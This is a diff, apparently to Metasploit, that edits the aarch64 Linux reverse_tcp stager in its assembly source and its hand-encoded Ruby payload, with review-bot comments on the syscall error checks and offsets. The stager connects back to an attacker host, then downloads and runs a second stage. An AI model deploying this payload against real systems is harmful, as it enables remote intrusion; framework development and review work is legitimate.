diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
index 7c049b8308..7bf02f863e 100644
--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -37,9 +37,10 @@ start:
 mov x2, #4
 mov x8, SYS_READ
 svc 0
- cbz w0, failed
+ cmn x0, #0x1
+ beq failed
- ldr x2, [sp,#0]
+ ldr w2, [sp,#0]
 /* Page-align, assume <4GB */
 lsr x2, x2, #12
@@ -53,12 +54,13 @@ start:
 mov x3, #34
 mov x4, xzr
 mov x5, xzr
- /* call mmap() */
- movi x8, SYS_MMAP
+ mov x8, SYS_MMAP
 svc 0
+ cmn x0, #0x1
+ beq failed
 /* Grab the saved size, save the address */
- ldr x4, [sp]
+ ldr w4, [sp]
 /* Save the memory address */
 str x0, [sp]
@@ -73,13 +75,15 @@ read_loop:
 mov x2, x4
 mov x8, SYS_READ
 svc 0
+ cmn x0, #0x1
+ beq failed
 add x3, x3, x0
 subs x4, x4, x0
 bne read_loop
 /* Go to shellcode */
- ldr x30, [sp]
- ret
+ ldr x0, [sp]
+ blr x0
 failed:
 mov x0, 0
diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
index 2ebf658320..e2faeb7cbf 100644
--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -33,8 +33,8 @@ module MetasploitModule
 {
 'Offsets' =>
 {
- 'LPORT' => [ 186, 'n' ],
- 'LHOST' => [ 188, 'ADDR' ],
+ 'LPORT' => [ 206, 'n' ],
+ 'LHOST' => [ 208, 'ADDR' ],
 },
 'Payload' =>
 [
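Review bot: In the first hunk the new `cmn x0, #0x1` / `beq failed` pair recognises only x0 == -1, but a raw Linux syscall reports failure as -errno, so every other error value from read() falls through, and the EOF case (read() returning 0 on a closed connection) that the removed `cbz w0, failed` did catch is no longer handled, leaving `ldr w2, [sp,#0]` to load the uninitialised stack slot as the stage size. The same -1-only test is repeated after mmap() in the second hunk, where -ENOMEM and friends slip past, and after read() in the read_loop hunk, where a 0 return leaves `subs x4, x4, x0` unchanged and the loop spins. For the 4-byte size read an exact-length test, `cmp x0, #4` / `bne failed`, rejects errors, EOF and short reads together; in read_loop `cmp x0, #0` / `ble failed` (signed) catches EOF and every -errno; for mmap() `cmn x0, #4095` / `bcs failed` sets C exactly when x0 lies in the -4095..-1 error range. Any of these changes the instruction count, so the hand-encoded words and the LPORT/LHOST 'Offsets' in reverse_tcp.rb would have to be regenerated alongside it.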
@@ -45,19 +45,20 @@ module MetasploitModule
 0xd28018c8, # mov x8, #0xc6 // #198
 0xd4000001, # svc #0x0
 0xaa0003ec, # mov x12, x0
- 0x10000501, # adr x1, b8
+ 0x100005a1, # adr x1, cc
 0xd2800202, # mov x2, #0x10 // #16
 0xd2801968, # mov x8, #0xcb // #203
 0xd4000001, # svc #0x0
- 0x35000420, # cbnz w0, ac
+ 0x350004c0, # cbnz w0, c0
 0xaa0c03e0, # mov x0, x12
 0xd10043ff, # sub sp, sp, #0x10
 0x910003e1, # mov x1, sp
 0xd2800082, # mov x2, #0x4 // #4
 0xd28007e8, # mov x8, #0x3f // #63
 0xd4000001, # svc #0x0
- 0x34000340, # cbz w0, ac
- 0xf94003e2, # ldr x2, [sp]
+ 0xb100041f, # cmn x0, #0x1
+ 0x540003c0, # b.eq c0
+ 0xb94003e2, # ldr w2, [sp]
 0xd34cfc42, # lsr x2, x2, #12
 0x91000442, # add x2, x2, #0x1
 0xd374cc42, # lsl x2, x2, #12
@@ -69,7 +70,9 @@ module MetasploitModule
 0xaa1f03e5, # mov x5, xzr
 0xd2801bc8, # mov x8, #0xde // #222
 0xd4000001, # svc #0x0
- 0xf94003e4, # ldr x4, [sp]
+ 0xb100041f, # cmn x0, #0x1
+ 0x54000200, # b.eq c0
+ 0xb94003e4, # ldr w4, [sp]
 0xf90003e0, # str x0, [sp]
 0xaa0003e3, # mov x3, x0
 0xaa0c03e0, # mov x0, x12
@@ -77,11 +80,13 @@ module MetasploitModule
 0xaa0403e2, # mov x2, x4
 0xd28007e8, # mov x8, #0x3f // #63
 0xd4000001, # svc #0x0
+ 0xb100041f, # cmn x0, #0x1
+ 0x540000c0, # b.eq c0
 0x8b000063, # add x3, x3, x0
 0xeb000084, # subs x4, x4, x0
- 0x54ffff21, # b.ne 84
- 0xf94003fe, # ldr x30, [sp]
- 0xd65f03c0, # ret
+ 0x54fffee1, # b.ne 90
+ 0xf94003e0, # ldr x0, [sp]
+ 0xd63f0000, # blr x0
 0xd2800000, # mov x0, #0x0 // #0
 0xd2800ba8, # mov x8, #0x5d // #93
 0xd4000001, # svc #0x0
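Review bot: The Payload array edited in this hunk, and in the two hunks that follow in the same file, is a hand-encoded copy of stager_sock_reverse.s, and nothing in the module says so or records how the displacement targets in the word comments (`b.eq c0`, `b.ne 90`, `adr x1, cc`) and the 'Offsets' entries were derived, so the next edit to the .s can silently leave them stale. The encodings themselves line up with the .s change: `0xb100041f` is `cmn x0, #1`, the four cbnz/b.eq displacements all land on the `mov x0, #0x0` word that begins `failed`, and `adr x1, cc` puts the port and address at the new LPORT/LHOST offsets 206 and 208. That makes this a documentation point: add a comment above the first word, such as `# Assembled from external/source/shellcode/linux/aarch64/stager_sock_reverse.s; regenerate these words and the 'Offsets' entries together whenever that file changes`.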